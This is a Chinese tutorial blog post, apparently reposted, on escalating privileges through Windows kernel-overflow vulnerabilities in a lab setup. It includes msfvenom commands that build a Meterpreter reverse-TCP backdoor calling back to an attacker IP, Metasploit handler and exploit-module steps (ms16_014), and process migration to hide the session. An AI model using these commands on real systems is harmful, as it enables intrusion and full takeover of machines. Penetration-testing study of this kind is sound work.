Windows系统内核溢出漏洞提权

这篇具有很好参考价值的文章主要介绍了Windows系统内核溢出漏洞提权。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

 Windows内核溢出漏洞原理

溢出漏洞简介

什么是缓冲区

缓冲区溢出

缓冲区溢出目的

Windows内核溢出漏洞利用流程

提权实战思路

手工提权测试

辅助提权

EXP如何寻找

使用MSF提权

关于提权时可能遇到的问题

如果提权的时候发现无法执行命令的话,可以上传一个cmd.exe到可读写目录再执行


Windows系统内核溢出漏洞提权

 Windows内核溢出漏洞原理

溢出漏洞的全名:缓冲区溢出漏洞。

溢出漏洞简介

溢出漏洞是一种计算机程序的可更正性缺陷。

因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。

什么是缓冲区

在内存空间中预留了一定的存储空间用来缓冲输入或输出的数据。 通俗的讲,缓冲区就是当你打开应用程序或者文件的时候,系统会将数据从内存中复制一份到缓冲区,当再次打开时,系统直接从缓冲区读取,提高打开的速度。

缓冲区溢出

在程序试图将数据放到及其内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出。缓冲区溢出就好比是将十升水放进只有五升容量的桶里。很显然,一旦容器满了,余下的部分就会溢出在地板上,弄得一团糟。

缓冲区溢出目的

缓冲区溢出的目的在于扰乱具有某些运行特权的程序的功能,这样可以让攻击者取得程序的控制权,如果该程序具有足够的权限,那么整个主机就被控制了。

在实际场景中,攻击者写一个超过缓冲区长度的字符串,植入到缓冲区时可能会出现两种结果:一是过长的字符串覆盖了相邻的存储单元,引起程序运行失败,严重的可导致系统崩溃;另一个结果就是利用这种漏洞可以劫持进程、执行任意指令,甚至可以取得系统权限。

Windows内核溢出漏洞利用流程

Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用该漏洞的关键是目标系统有没有及时安装补丁,如果目标系统没有安装某一漏洞的补丁且存在该漏洞的话,攻击者就会向目标系统上传本地溢出程序,溢出Administrator权限。
提权流程:
(1) 获取到一个低权限shell后,执行systeminfo命令查看系统安装的补丁列表
(2) 根据补丁程序与微软的漏洞数据库进行比较,找出可能导致权限提升的漏洞.

提权实战思路

大概有两种思路:

  • 基于手工测试
  • 基于工具的自动化提权:MSF/CS

手工提权测试

主要思路就是获取系统上的补丁信息,根据第三网站或者项目寻找EXP。

辅助提权

Github项目:WindowsVulnScan/version1 at master · chroblert/WindowsVulnScan · GitHub

该工具如何使用请参考我得另外一篇博客:提权神器:WindowsVulnScan_貌美不及玲珑心,贤妻扶我青云志的博客-CSDN博客

这款工具测试Win7系统时遭遇失败:

Windows系统内核溢出漏洞提权

还有第三方分析的网站:提权辅助网页 Windows提权辅助

Windows系统内核溢出漏洞提权

分析结果:

Windows系统内核溢出漏洞提权

 之后就是根据结果寻找EXP测试

EXP如何寻找

Github上的项目推荐:

GitHub - Ascotbe/Kernelhub: Linux、macOS、Windows Kernel privilege escalation vulnerability collection, with compilation environment, demo GIF map, vulnerability details, executable file (提权漏洞合集)

GitHub - nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.

项目上集成有大量的EXP,根据上面信息收集获得可利用漏洞逐一尝试即可。

使用MSF提权

测试环境

                靶机:   Win7 192.168.226.133

                攻击机:Kali   192.168.226.132

生成木马:使用第一条命令生成木马 test.exe

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.226.132 LPORT=3333 -f exe -o test.exe (32位)

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp
LHOST=192.168.226.132 LPORT=3333 -f exe -o test.exe (64位)

Windows系统内核溢出漏洞提权

进入监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
exploit

另外需要注意一个位置,exe的位置要注意,我们权限低,目录没有修改权限,需要放在我们具有修改执行权限的目录下。

还有就是监听的网卡设置,0.0.0.0 表示监听所有的网卡

这样就建立号后门链接了

Windows系统内核溢出漏洞提权

 上线后进行进程迁移(隐藏自己),把进程迁移到explore.exe中,1844为进程的pid

migrate 1844

接下来开始提权,使用post/multi/recon/local_exploit_suggester这个模块进行测试

system为Win7最高权限,开始提权!首先输入background命令将session放到后台

Windows系统内核溢出漏洞提权

 执行攻击模块,它可以快速识别系统中可利用的漏洞

use post/multi/recon/local_exploit_suggester
set session 2
run

Windows系统内核溢出漏洞提权

 获得了可以用来利用提权的模块,使用对应的脚本然后进行提权即可

use exploit/windows/local/ms16_014_wmi_recv_notif
set session 2
run

Windows系统内核溢出漏洞提权

 成功提权

Windows系统内核溢出漏洞提权

关于提权时可能遇到的问题

如何管理会话

sessions -l 显示所有的会话

sessions -i ID 连接指定的会话

在利用msf进行提权操作是出现timed out:Error running command shell: Rex::TimeoutError Operation timed out.

虚拟切换为NAT模式即可

Windows系统内核溢出漏洞提权

 MSF漏洞利用完成但无法创建会话的几种原因

参考博客:MSF漏洞利用完成但无法创建会话的几种原因_漏洞利用成功但未建立会话_Q1X1的博客-CSDN博客文章来源地址https://www.toymoban.com/news/detail-471877.html

如果提权的时候发现无法执行命令的话,可以上传一个cmd.exe到可读写目录再执行

到了这里,关于Windows系统内核溢出漏洞提权的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [漏洞分析] 用chatGPT分析CVE-2023-0386 overlay内核提权

    本文的理论知识(命名空间、overlay文件系统、fuse文件系统等)均来自chatGPT。 漏洞编号: CVE-2023-0386 漏洞产品: linux kernel - overlay文件系统 影响范围: 5.11 ~ 5.19 利用条件: 可以unshar 或可以创建overlay文件系统 利用效果: 本地提权 自己编译内核: 准备漏洞版本范围内的,5.15版本之

    2024年02月05日
    浏览(41)
  • 操作系统权限提升(十八)之Linux提权-内核提权

    内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节: 1、对目标系统进行信息收集,获取到系统内核信息及版本信息; 2、根据内核版本获取其对应的漏洞以及EXP 3、使用找到的EXP对目标系统发起攻击,完成提权操作 查看Linux操作系统的内核版本

    2024年01月16日
    浏览(45)
  • 系统漏洞利用与提权

    1.使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交;(1分) 首先第一道题目的思路就是使用nmap来进行扫描: Flag:[21,22,80] 2.通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:

    2024年02月07日
    浏览(43)
  • windows提权-系统错误配置提权

    目录 windows提权-系统错误配置提权 一、错误配置提权介绍 二、Tusted Service Paths提权 三、PATH环境变量提权 四、不安全的服务提权 五、不安全注册表提权 六、注册表键AlwaysInstall提权 七、泄露敏感信息提权 八、计划任务提权 九、启动项提权 随着网络安全的发展和普及,不打补

    2024年02月03日
    浏览(35)
  • MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现

    What is SMB? SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和

    2024年02月08日
    浏览(36)
  • 漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】

    虚拟机软件:vmware workstation 14 系统:Windows XP 系统、Kali系统 环境配置:(1)受害机:Windows XP SP3镜像(2)攻击机:Kali系统 (1)虚拟机受害机系统和攻击机系统之间能够相互通信 攻击机:Kali-192.168.110.129 目标机:Windows XP-192.168.110.128 (2)打开Windows XP系统,确定445端口开启

    2024年02月15日
    浏览(50)
  • 通过条件竞争实现内核提权

    条件竞争漏洞(Race Condition Vulnerability)是一种在多线程或多进程并发执行时可能导致不正确行为或数据损坏的安全问题。这种漏洞通常发生在多个线程或进程试图访问和修改共享资源(如内存、文件、网络连接等)时,由于执行顺序不确定或没有适当的同步措施,导致竞争条

    2024年02月08日
    浏览(49)
  • KIOPTRIX: LEVEL 1.1 (#2) 常规命令注入+内核提权

    🔥系列专栏:Vulnhub靶机渗透系列 🔥欢迎大佬:👍点赞⭐️收藏➕关注 🔥首发时间: 2023年8月20日 🌴如有错误 还望告知 万分感谢 目录 🌴 基本信息: 🌴 信息收集 主机发现、端口扫描、服务枚举、脚本漏扫(nmap) PORT 111 rpcbind PORT 631 ipp 目录扫描(dirsearch、gobuster) P

    2024年02月12日
    浏览(36)
  • kioptrix: level 1.1 (#2) 简单命令注入+内核提权

    🔥系列专栏:Vulnhub靶机渗透系列 🔥欢迎大佬:👍点赞⭐️收藏➕关注 🔥首发时间: 2023年8月20日 🌴如有错误 还望告知 万分感谢 目录 🌴 基本信息: 🌴 信息收集 主机发现、端口扫描、服务枚举、脚本漏扫(nmap) PORT 111 rpcbind PORT 631 ipp 目录扫描(dirsearch、gobuster) P

    2024年02月12日
    浏览(44)
  • Linux内核之堆溢出的利用

    用户进程会通过 malloc 等函数进行动态内存分配相应的内核也有一套动态的内存分配机制。 有两种类型的计算机并且使用不同的方法管理物理内存 UMA计算机:每个处理器访问内存的速度一直 NUMA计算机:每个处理器访问自己的本地内存速度较快,但是访问其他处理器的本地内

    2024年02月09日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包